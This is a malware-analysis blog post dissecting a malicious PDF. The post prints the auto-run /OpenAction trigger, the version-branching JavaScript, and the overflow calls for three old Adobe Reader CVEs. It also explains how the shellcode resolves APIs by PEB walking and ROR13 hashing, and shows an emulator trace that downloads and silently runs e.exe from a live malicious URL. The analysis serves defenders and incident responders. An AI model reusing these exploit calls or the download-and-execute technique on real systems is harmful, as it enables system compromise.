Post

Adobe PDF Exploit

In the malware landscape, PDF documents have long been one of the most popular attack vectors. Thanks to vulnerabilities in Adobe Reader and its plugins, a seemingly harmless file can become the entry point to compromise a system.

In this article, we will analyze a real malicious PDF that exploits different vulnerabilities depending on the version of the reader installed, and we’ll see how it integrates a very compact shellcode (104 bytes) to download and execute a remote payload.

Sample Identification and Initial Triage

The malicious file under analysis is a PDF version 1.3 with a size of just 17 KB. At first glance, it doesn’t include Flash objects or embedded multimedia, but we quickly identified several JavaScript streams hidden inside the document. These scripts are automatically triggered through the /OpenAction directive, ensuring that the malicious code executes as soon as the file is opened in Adobe Reader.

To fingerprint the sample, we calculated the following hashes:

  • MD5: 9e4938009e8d3b06442b727e73a7958c
  • SHA-1: 139ac50c3f7e2def20be4077a59941235e0098ff
  • SHA-256: 0b3b3b22c8a6e3474150ea1cb8ab494413d3a641d475916114b8c4a94393f753

A check in VirusTotal showed a high detection rate across multiple AV engines, confirming that the document was already flagged as malicious.

virustotal.png

The internal structure analysis using PDFStreamDumper revealed three suspicious JavaScript objects, clearly pointing to an intentional exploitation setup rather than a benign document.

pdfstreamdumper.png

Using the collected information, we can summarize the metadata extracted from the online sandbox:

FieldValue
MD59e4938009e8d3b06442b727e73a7958c
SHA-1139ac50c3f7e2def20be4077a59941235e0098ff
SHA-2560b3b3b22c8a6e3474150ea1cb8ab494413d3a641d475916114b8c4a94393f753
Vhash92ed1bde3b4201a28f31eb183acad4fc8
SSDEEP192:T0G2mJhASZy09x86Oly09x8Dvj5lRZly09x8SRZkjXmdfRZo5suB:THJPZy09x8Dly09x8/5hly09x8y1o5T
TLSHT198726952AF9813A598604DF52349361724F2DE2F28D9319AE6D11E73B03EB13ECE9374
File TypePDF, document, pdf
MagicPDF document, version 1.3, 0 pages
TrIDAdobe Portable Document Format (100 %)
File Size17.06 KB (17,467 bytes)

The file is identified as a PDF document, version 1.3, with a total size of 17,467 bytes. No Flash objects or multimedia traces were observed, other than the three JavaScript streams. The object structure clearly indicates the deliberate use of /OpenAction in the root object, designed to trigger malicious code execution as soon as the PDF is opened.

Execution Flow of the Malicious PDF

The execution of the malware inside the PDF can be divided into several stages:

Phase 1 – Automatic Trigger

When the PDF is opened, the viewer processes the following entry in object 1:

1
/OpenAction << /JS (this.BXcfTYewQ()) /S /JavaScript >>

This directive ensures that the function BXcfTYewQ() is immediately executed in the Adobe Reader context.

Phase 2 – Deobfuscation and Dynamic Definition

The actual definition of BXcfTYewQ is located in object 13, wrapped in two layers of eval and a large String.fromCharCode(...) block that reconstructs the full script at runtime.

jsdeobf1.png

Once beautified with a tool like JS Beautifier, the code becomes more legible. We can then see that it dynamically defines:

  • Auxiliary functions (util_printf, collab_email, collab_geticon, pdf_start).
  • Shellcode injection via unescape() and preparation of a heap spray.

These functions contain the logic to exploit various Adobe Reader vulnerabilities (CVEs). The script ends by calling:

1
pdf_start();

jsbeautyfy.png

Phase 3 – PDF Reader Version Detection

Inside pdf_start(), the script retrieves the version of Adobe Reader:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
function pdf_start() {
    var version = app.viewerVersion.toString();
    version = version.replace(/\D/g, '');
    var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));

    if ((varsion_array[0] == 8) && (varsion_array[1] == 0) ||
        (varsion_array[1] == 1 && varsion_array[2] < 3)) {
        util_printf();
    }

    if ((varsion_array[0] < 8) ||
        (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)) {
        collab_email();
    }

    if ((varsion_array[0] < 9) ||
        (varsion_array[0] == 9 && varsion_array[1] < 1)) {
        collab_geticon();
    }
}

For example, version “8.1.1” is converted into “811” for numerical comparison, allowing the script to branch the attack depending on the environment.

Phase 4 – Selection of the Attack Vector

Depending on the detected version, one of three exploits is triggered:

  • Option A – util_printf() (CVE-2008-2992)
    Applicable to versions 8.0.0–8.1.2.
    A heap spray is prepared with 0x40000-byte blocks containing a NOP sled and the shellcode. Then the function call:

    1
    
      util.printf("%45000f", num);
    

    This overflows the internal buffer of printf, redirecting execution into the sprayed shellcode (RCE).

  • Option B – collab_email() (CVE-2007-5659)
    Used as a fallback if the version is older than 8.1.1 but does not match the first condition.
    It abuses:

    1
    
      collab.collectEmailInfo({ subj:"", msg:overflow });
    

    The overflow occurs in the msg field, again redirecting execution to the same shellcode.

  • Option C – collab_geticon() (CVE-2009-0927)
    Used as a last resort if Adobe Reader is older than 9.1 and the previous attempts fail.
    The exploit is triggered with:

    1
    
      app.doc.Collab.getIcon(overflowString);
    

    In some cases, this results in fingerprinting or a DoS condition in vulnerable readers.

Adobe Reader VersionExploit UsedExpected Result
8.0.0 – 8.1.2util.printf()Remote Code Execution
< 8.1.1collab_email()Remote Code Execution
< 9.1collab_geticon()Possible RCE / DoS
≥ 9.1NoneNo effect

Embedded Shellcode Analysis

The obfuscated JavaScript inside the PDF builds a heap spray that embeds the payload as sequences of %uXXXX. To extract it, we used a small Python script that:

  1. Reads the obfuscated JavaScript and finds all %uXXXX occurrences.
  2. For each XXXX, swaps the byte order (e.g., 0x1234 -> 34 12).
  3. Concatenates all results into a byte array.
  4. Saves the output into shellcode.bin.

shellcode_dump.png

As a result, we obtained a 104-byte binary.

Static Analysis in IDA

Loading shellcode.bin into IDA reveals a compact but fully functional flow:

  • Dynamic API resolution – No direct imports; instead, the code walks the PEB to locate kernel32.dll and urlmon.dll, then computes function name hashes from the Export Table and compares them against precomputed values.
  • Runtime string construction – Paths like %TEMP%\e.exe and the remote URL are assembled byte by byte using instructions such as stosb, stosw, and stosd.
  • Download & execution logic – After resolving URLDownloadToFileA and WinExec, the shellcode downloads the payload and executes it with SW_HIDE, finally calling ExitThread(0).

shellcode_analisis_main.png

Remarkably, the author fit all this functionality into only 104 bytes, implementing ROR13 hashing and avoiding static references to make AV detection more difficult.

PEB Walking and Function Hashing

The routine that resolves APIs begins by reading the fs:[30h] segment register to obtain the PEB address. From there:

  1. It accesses PEB->Ldr.InInitializationOrderModuleList to iterate loaded modules.
  2. For each entry (LDR_DATA_TABLE_ENTRY), it retrieves the module name (e.g., kernel32.dll).
  3. It walks the Export Directory, extracts each function name, and computes a rolling ROR13 hash:

    1
    
     hash = ROR(hash, 13) XOR character
    

    Example of resolved hashes:

FunctionHash (hex)
GetTempPathA5B8ACA33
LoadLibraryAEC0E4E8E
URLDownloadToFileA702F1A36
WinExec0E8AFE98
ExitThread60E0CEEF
  1. If the computed hash matches one hardcoded in the shellcode, the function pointer is retrieved.

shellcode_analisis_pebwalking.png
shellcode_analisis_pebwalking2.png

This technique keeps the shellcode independent of absolute addresses and avoids visible import tables.

Controlled Execution with scDbg

To safely validate execution, we used scDbg with interactive hooks and memory monitoring. Running shellcode.bin at base address 0x401000 produced the following trace:

1
2
3
4
5
6
7
401086 GetTempPathA(len=88, buf=0x12fd80) = 25
4010B0 LoadLibraryA("urlmon.dll")
4010CA URLDownloadToFileA(
          "http://juvitec.net/css/load.php?e=2",
          "C:\\Users\\vboxuser\\AppData\\Local\\Temp\\e.exe",0,0)
4010D7 WinExec("C:\\Users\\vboxuser\\AppData\\Local\\Temp\\e.exe", SW_HIDE)
4010E0 ExitThread(0)

shellcode_sandbox.png

We also observed access to fs:[30h] and reads of the module list, confirming the same behavior described in the static analysis.

Indicators of Compromise (IOCs)

During the analysis, several artifacts were identified that can serve as Indicators of Compromise (IOCs). These help blue teams and incident responders detect whether this exploit or its payload has been executed in their environment.

TypeValue
MD5 (PDF)9e4938009e8d3b06442b727e73a7958c
SHA-1 (PDF)139ac50c3f7e2def20be4077a59941235e0098ff
SHA-256 (PDF)0b3b3b22c8a6e3474150ea1cb8ab494413d3a641d475916114b8c4a94393f753
Malicious URLhxxp://juvitec.net/css/load.php?e=2
Dropped File%TEMP%\e.exe
Exploit TechniquesCVE-2008-2992 (util.printf), CVE-2007-5659 (collab.collectEmailInfo), CVE-2009-0927 (collab.getIcon)
This post is licensed under CC BY 4.0 by the author.